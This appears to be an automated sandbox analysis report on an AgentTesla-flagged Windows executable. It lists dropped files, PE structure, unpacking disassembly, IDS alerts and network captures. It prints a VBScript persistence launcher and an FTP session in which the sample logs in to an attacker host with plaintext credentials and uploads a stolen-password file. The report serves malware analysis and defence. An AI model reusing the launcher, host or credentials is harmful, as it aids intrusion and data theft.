                                  Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):145858
                                  Entropy (8bit):7.932961480786955
                                  Encrypted:false
                                  SSDEEP:3072:ITVCXomKKjaplxH0y4SemHQADsuAeAfrMv6yn/wi/EuHmo4GIG1gpqq:kC43KeF0y4kHPw/fQ6K/wrloRgpqq
                                  MD5:D0303F79E60A6141398F02F8633A1C84
                                  SHA1:CB3A8F2514B107AF77A31A282E976FA6F858012C
                                  SHA-256:403C9C5FE0F66031019230A513EE618B1ABA961430C9E496D88F2A8D09903122
                                  SHA-512:A855EA1D71CCE1F4F0265E4238B313FB284D4037677EF2524E6ED1DB97FCAAAC83FAB90F582B8B974B5BF24C62F46237FC2495F10B7CEB2E4B3EB6B556D167AA
                                  Malicious:false
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15164
                                  Entropy (8bit):7.586580449950993
                                  Encrypted:false
                                  SSDEEP:384:E9/Rtsnvg+rszHYJ3RfCcQXtlJNUM0/kMr8Ad9GTbx:ERA4+rszmCVXtlJNv0cMr8Aqp
                                  MD5:66846AEF53EF56251022A8A41B58BCBD
                                  SHA1:18C07153E15706C74B9ABB00A181874BD32C8CC6
                                  SHA-256:9DE04BF5A68396247654016C9108D6B48A452C065B7ABECBB0A9CB27890813CF
                                  SHA-512:4DAF1E3C0BDB017E77EA42C86315CE8F19A3924615A781101BEE04CED3C263FFF26BA3CF77BE6795464681E557FAA1E5CEDAC69F49843DC3ED2E4541F0F098BA
                                  Malicious:false
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):145858
                                  Entropy (8bit):7.932961480786955
                                  Encrypted:false
                                  SSDEEP:3072:ITVCXomKKjaplxH0y4SemHQADsuAeAfrMv6yn/wi/EuHmo4GIG1gpqq:kC43KeF0y4kHPw/fQ6K/wrloRgpqq
                                  MD5:D0303F79E60A6141398F02F8633A1C84
                                  SHA1:CB3A8F2514B107AF77A31A282E976FA6F858012C
                                  SHA-256:403C9C5FE0F66031019230A513EE618B1ABA961430C9E496D88F2A8D09903122
                                  SHA-512:A855EA1D71CCE1F4F0265E4238B313FB284D4037677EF2524E6ED1DB97FCAAAC83FAB90F582B8B974B5BF24C62F46237FC2495F10B7CEB2E4B3EB6B556D167AA
                                  Malicious:false
                                  Process:C:\Users\user\Desktop\XoRPyi5s1i.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:dropped
                                  Size (bytes):178198
                                  Entropy (8bit):3.174329330978397
                                  Encrypted:false
                                  SSDEEP:48:sb3feqfCpfS6ftqfA0f9fWf9fZ1fi20fq0fFfY6fofi51fK0fi0fCfZ1fK0f70fg:iaNibHCIL8aDfffXz6w43Ck/sqoHklX
                                  MD5:A09D7CF7B10B8AF8265563ECFD0DEC02
                                  SHA1:8603B072F64A75D50663F4BA60F94DE0C7E59FD4
                                  SHA-256:01937F48007048229842F0743CC2D2F80330289E8A3FA26DBF32A13D6C95B339
                                  SHA-512:029C037CD58C55420C34BD68CC467947B877888E26E4C84D8FA68F97D667D7EE4A6DED7AC5152BA0C0C61182205B58D9F4A5CC6C409EDFDFAB4074DE3AB49764
                                  Malicious:false
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):288
                                  Entropy (8bit):3.4173336582208513
                                  Encrypted:false
                                  SSDEEP:6:DMM8lfm3OOQdUfclwL1UEZ+lX14lDRw1blanriIM8lfQVn:DsO+vNlwBQ1oFwBlYmA2n
                                  MD5:9CA9F5C10E4515D40608CCBC7CAC077C
                                  SHA1:46E834D545178757AE333AC2B0EB0E365BEE46C7
                                  SHA-256:B488992CCBEED1685ED528794139CC44D84CA744AAEB51EA5BB192E3824E6AB1
                                  SHA-512:C42499CB47DD6ED6589504F39A410498B523CBB73B8FADFD81CD938E5375BC1AF602A80B4DF0D64FA83A55174FB94071015F2C66279F6D8F7E5EC7668E5A77F3
                                  Malicious:true
Preview (UTF-16LE text, decoded):
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\Users\hubert\AppData\Local\Lityerses\unjuridically.exe", 1
Set WshShell = Nothing
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Entropy (8bit):7.9240582473113905
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.39%
                                  • UPX compressed Win32 Executable (30571/9) 0.30%
                                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  File name:XoRPyi5s1i.exe
                                  File size:550'912 bytes
                                  MD5:fc76d8b178c0aa094eba5fea74e82614
                                  SHA1:f2f88413e1e3aed4fd731769037c3d2391d29c94
                                  SHA256:811c8854ea3adcd1259c28cf1dc60e0a0a2f7a44f463e98f77c277a2a2f6394b
                                  SHA512:72f5ca123610cbc3ccee6630148c61e99f8ddbffbbe835eb2bf323a0a6d5f2fdd57bafa139595e62ea485f2086b1dd46f994281070639cd5e7ff89eb3422fd2b
                                  SSDEEP:12288:ZOv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPiGDtC2ajbP50s3o32+:Zq5TfcdHj4fmbcv13GV
                                  TLSH:91C422A09490CCB7E6913771C17ACEA50A287932DE85675D1BA4F20E78B278355C3B3F
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                  Icon Hash:aaf3e3e3938382a0
                                  Entrypoint:0x50af60
                                  Entrypoint Section:UPX1
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x6768EE06 [Mon Dec 23 04:58:46 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:ef471c0edf1877cd5a881a6a8bf647b9
                                  Instruction
                                  pushad
                                  mov esi, 004B7000h
                                  lea edi, dword ptr [esi-000B6000h]
                                  push edi
                                  jmp 00007F33C4DF854Dh
                                  nop
                                  mov al, byte ptr [esi]
                                  inc esi
                                  mov byte ptr [edi], al
                                  inc edi
                                  add ebx, ebx
                                  jne 00007F33C4DF8549h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F33C4DF852Fh
                                  mov eax, 00000001h
                                  add ebx, ebx
                                  jne 00007F33C4DF8549h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc eax, eax
                                  add ebx, ebx
                                  jnc 00007F33C4DF854Dh
                                  jne 00007F33C4DF856Ah
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F33C4DF8561h
                                  dec eax
                                  add ebx, ebx
                                  jne 00007F33C4DF8549h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc eax, eax
                                  jmp 00007F33C4DF8516h
                                  add ebx, ebx
                                  jne 00007F33C4DF8549h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc ecx, ecx
                                  jmp 00007F33C4DF8594h
                                  xor ecx, ecx
                                  sub eax, 03h
                                  jc 00007F33C4DF8553h
                                  shl eax, 08h
                                  mov al, byte ptr [esi]
                                  inc esi
                                  xor eax, FFFFFFFFh
                                  je 00007F33C4DF85B7h
                                  sar eax, 1
                                  mov ebp, eax
                                  jmp 00007F33C4DF854Dh
                                  add ebx, ebx
                                  jne 00007F33C4DF8549h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F33C4DF850Eh
                                  inc ecx
                                  add ebx, ebx
                                  jne 00007F33C4DF8549h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F33C4DF8500h
                                  add ebx, ebx
                                  jne 00007F33C4DF8549h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc ecx, ecx
                                  add ebx, ebx
                                  jnc 00007F33C4DF8531h
                                  jne 00007F33C4DF854Bh
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jnc 00007F33C4DF8526h
                                  add ecx, 02h
                                  cmp ebp, FFFFFB00h
                                  adc ecx, 02h
                                  lea edx, dword ptr [edi+ebp]
                                  cmp ebp, FFFFFFFCh
                                  jbe 00007F33C4DF8550h
                                  mov al, byte ptr [edx]
                                  Programming Language:
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [ASM] VS2012 UPD4 build 61030
                                  • [RES] VS2012 UPD4 build 61030
                                  • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x13ddb0 | 0x424 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x10c000 | 0x31db0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x13e1d4 | 0x18 | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x10b144 | 0x48 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0xb6000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0xb7000 | 0x55000 | 0x54200 | b39f99699c35c7412c65719709b96360 | False | 0.9887281760772659 | data | 7.9369165461082085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x10c000 | 0x33000 | 0x32200 | 4b935071c0d122b398417d2440a0815e | False | 0.8989294342269327 | data | 7.830114850814129 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x10c5ac | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0x10c6d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0x10c804 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0x10c930 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0x10cc1c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0x10cd48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0x10dbf4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0x10e4a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0x10ea0c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0x110fb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0x112064 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 1.1375
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 1.007703081232493
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 1.0065710872162486
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 1.009417808219178
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 1.0071801566579635
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 1.0067567567567568
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 1.0097690941385435
RT_STRING | 0xcc660 | 0x158 | data | English | Great Britain | 1.0319767441860466
RT_RCDATA | 0x1124d0 | 0x2b388 | data | - | - | 1.0003445704731349
RT_GROUP_ICON | 0x13d85c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x13d8d8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x13d8f0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x13d908 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x13d920 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x13da00 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll | AddAce
COMCTL32.dll | ImageList_Remove
COMDLG32.dll | GetSaveFileNameW
GDI32.dll | LineTo
IPHLPAPI.DLL | IcmpSendEcho
MPR.dll | WNetUseConnectionW
ole32.dll | CoGetObject
OLEAUT32.dll | VariantInit
PSAPI.DLL | GetProcessMemoryInfo
SHELL32.dll | DragFinish
USER32.dll | GetDC
USERENV.dll | LoadUserProfileW
UxTheme.dll | IsThemeActive
VERSION.dll | VerQueryValueW
WININET.dll | FtpOpenFileW
WINMM.dll | timeGetTime
WSOCK32.dll | socket
Language of compilation system | Country where language is spoken | Map
English | Great Britain | -
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T17:51:38.374886+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.8 | 49711 | 162.241.62.63 | 21 | TCP
2025-01-10T17:51:38.771740+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.8 | 49712 | 162.241.62.63 | 43704 | TCP
2025-01-10T17:51:38.778606+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.8 | 49712 | 162.241.62.63 | 43704 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 17:51:24.229266882 CET | 49704 | 80 | 192.168.2.8 | 208.95.112.1
Jan 10, 2025 17:51:24.234203100 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.8
Jan 10, 2025 17:51:24.234292984 CET | 49704 | 80 | 192.168.2.8 | 208.95.112.1
Jan 10, 2025 17:51:24.245347023 CET | 49704 | 80 | 192.168.2.8 | 208.95.112.1
Jan 10, 2025 17:51:24.250240088 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.8
Jan 10, 2025 17:51:24.753062010 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.8
Jan 10, 2025 17:51:24.801062107 CET | 49704 | 80 | 192.168.2.8 | 208.95.112.1
Jan 10, 2025 17:51:28.101537943 CET | 49706 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:28.106374979 CET | 21 | 49706 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:28.106442928 CET | 49706 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:28.412142992 CET | 49706 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:28.417073965 CET | 21 | 49706 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:28.417118073 CET | 49706 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:35.437417984 CET | 49710 | 80 | 192.168.2.8 | 208.95.112.1
Jan 10, 2025 17:51:35.442301989 CET | 80 | 49710 | 208.95.112.1 | 192.168.2.8
Jan 10, 2025 17:51:35.442408085 CET | 49710 | 80 | 192.168.2.8 | 208.95.112.1
Jan 10, 2025 17:51:35.442747116 CET | 49710 | 80 | 192.168.2.8 | 208.95.112.1
Jan 10, 2025 17:51:35.447511911 CET | 80 | 49710 | 208.95.112.1 | 192.168.2.8
Jan 10, 2025 17:51:35.916877031 CET | 80 | 49710 | 208.95.112.1 | 192.168.2.8
Jan 10, 2025 17:51:35.974479914 CET | 49710 | 80 | 192.168.2.8 | 208.95.112.1
Jan 10, 2025 17:51:36.521711111 CET | 49704 | 80 | 192.168.2.8 | 208.95.112.1
Jan 10, 2025 17:51:36.817935944 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:36.822803020 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:36.822905064 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:37.368268013 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:37.368504047 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:37.373426914 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:37.680449009 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:37.680736065 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:37.685818911 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:37.898473024 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:37.898613930 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:37.903386116 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:38.013902903 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:38.014071941 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:38.019049883 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:38.130022049 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:38.130220890 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:38.135068893 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:38.245302916 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:38.245445013 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:38.250247002 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:38.369242907 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:38.369963884 CET | 49712 | 43704 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:38.374739885 CET | 43704 | 49712 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:38.374808073 CET | 49712 | 43704 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:38.374886036 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:38.379755974 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:38.771456957 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:38.771739960 CET | 49712 | 43704 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:38.771797895 CET | 49712 | 43704 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:38.776519060 CET | 43704 | 49712 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:38.776849031 CET | 43704 | 49712 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:38.778605938 CET | 49712 | 43704 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:38.817692041 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:38.902590990 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8
Jan 10, 2025 17:51:38.957304001 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63
Jan 10, 2025 17:51:55.902669907 CET | 65240 | 53 | 192.168.2.8 | 162.159.36.2
Jan 10, 2025 17:51:55.907650948 CET | 53 | 65240 | 162.159.36.2 | 192.168.2.8
Jan 10, 2025 17:51:55.907727003 CET | 65240 | 53 | 192.168.2.8 | 162.159.36.2
Jan 10, 2025 17:51:55.912623882 CET | 53 | 65240 | 162.159.36.2 | 192.168.2.8
Jan 10, 2025 17:51:56.380001068 CET | 65240 | 53 | 192.168.2.8 | 162.159.36.2
Jan 10, 2025 17:51:56.385041952 CET | 53 | 65240 | 162.159.36.2 | 192.168.2.8
Jan 10, 2025 17:51:56.385108948 CET | 65240 | 53 | 192.168.2.8 | 162.159.36.2
Jan 10, 2025 17:52:26.832586050 CET | 49710 | 80 | 192.168.2.8 | 208.95.112.1
Jan 10, 2025 17:52:26.837745905 CET | 80 | 49710 | 208.95.112.1 | 192.168.2.8
Jan 10, 2025 17:52:26.839615107 CET | 49710 | 80 | 192.168.2.8 | 208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 17:51:24.164252996 CET | 54902 | 53 | 192.168.2.8 | 1.1.1.1
Jan 10, 2025 17:51:24.172296047 CET | 53 | 54902 | 1.1.1.1 | 192.168.2.8
Jan 10, 2025 17:51:27.784645081 CET | 61544 | 53 | 192.168.2.8 | 1.1.1.1
Jan 10, 2025 17:51:28.100369930 CET | 53 | 61544 | 1.1.1.1 | 192.168.2.8
Jan 10, 2025 17:51:55.902096987 CET | 53 | 54512 | 162.159.36.2 | 192.168.2.8
Jan 10, 2025 17:51:56.407669067 CET | 53 | 63433 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 17:51:24.164252996 CET | 192.168.2.8 | 1.1.1.1 | 0x90b1 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:51:27.784645081 CET | 192.168.2.8 | 1.1.1.1 | 0x3950 | Standard query (0) | ftp.antoniomayol.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 17:51:24.172296047 CET | 1.1.1.1 | 192.168.2.8 | 0x90b1 | No error (0) | ip-api.com | - | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 17:51:28.100369930 CET | 1.1.1.1 | 192.168.2.8 | 0x3950 | No error (0) | ftp.antoniomayol.com | antoniomayol.com | - | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 17:51:28.100369930 CET | 1.1.1.1 | 192.168.2.8 | 0x3950 | No error (0) | antoniomayol.com | - | 162.241.62.63 | A (IP address) | IN (0x0001) | false
                                  • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49704 | 208.95.112.1 | 80 | 1712 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 17:51:24.245347023 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Jan 10, 2025 17:51:24.753062010 CET | 175 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 16:51:24 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49710 | 208.95.112.1 | 80 | 6796 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 17:51:35.442747116 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Jan 10, 2025 17:51:35.916877031 CET | 175 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 16:51:35 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 48
X-Rl: 43
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jan 10, 2025 17:51:37.368268013 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 9 of 150 allowed.
220-Local time is now 10:51. Server port: 21.
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Jan 10, 2025 17:51:37.368504047 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63 | USER johnson@antoniomayol.com
Jan 10, 2025 17:51:37.680449009 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8 | 331 User johnson@antoniomayol.com OK. Password required
Jan 10, 2025 17:51:37.680736065 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63 | PASS cMhKDQUk1{;%
Jan 10, 2025 17:51:37.898473024 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8 | 230-OK. Current restricted directory is /
230 16 Kbytes used (0%) - authorized: 2048000 Kb
Jan 10, 2025 17:51:38.013902903 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8 | 504 Unknown command
Jan 10, 2025 17:51:38.014071941 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63 | PWD
Jan 10, 2025 17:51:38.130022049 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8 | 257 "/" is your current location
Jan 10, 2025 17:51:38.130220890 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63 | TYPE I
Jan 10, 2025 17:51:38.245302916 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8 | 200 TYPE is now 8-bit binary
Jan 10, 2025 17:51:38.245445013 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63 | PASV
Jan 10, 2025 17:51:38.369242907 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8 | 227 Entering Passive Mode (162,241,62,63,170,184)
Jan 10, 2025 17:51:38.374886036 CET | 49711 | 21 | 192.168.2.8 | 162.241.62.63 | STOR PW_user-760639_2025_01_10_11_51_36.html
Jan 10, 2025 17:51:38.771456957 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8 | 150 Accepted data connection
Jan 10, 2025 17:51:38.902590990 CET | 21 | 49711 | 162.241.62.63 | 192.168.2.8 | 226-16 Kbytes used (0%) - authorized: 2048000 Kb
226-File successfully transferred
226 0.117 seconds (measured here), 2.68 Kbytes per second


                                  Target ID:1
